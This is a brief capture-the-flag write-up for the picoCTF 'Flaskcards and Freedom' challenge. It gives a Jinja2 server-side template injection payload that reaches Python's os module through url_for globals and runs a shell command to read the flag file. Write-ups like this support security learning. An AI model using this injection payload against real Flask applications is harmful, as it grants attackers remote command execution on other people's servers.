Tags: ssti 


# ▼▼▼Flaskcards and Freedom - Points: 900▼▼▼
**This writeup is written by [@kazkiti_ctf](https://twitter.com/kazkiti_ctf)**

There seem to be a few more files stored on the flash card server but we can't login. Can you? http://2018shell2.picoctf.com:5010 (link)

・There's more to the original vulnerability than meets the eye.
・Can you leverage the injection technique to get remote code execution?
・Sorry, but the database still reverts every 2 hours.


## 【Aim for remote code execution】


app flag server.py xinet_startup.sh

There is `flag` file


`{{url_for.__globals__.os.__dict__.popen('cat flag').read()}}`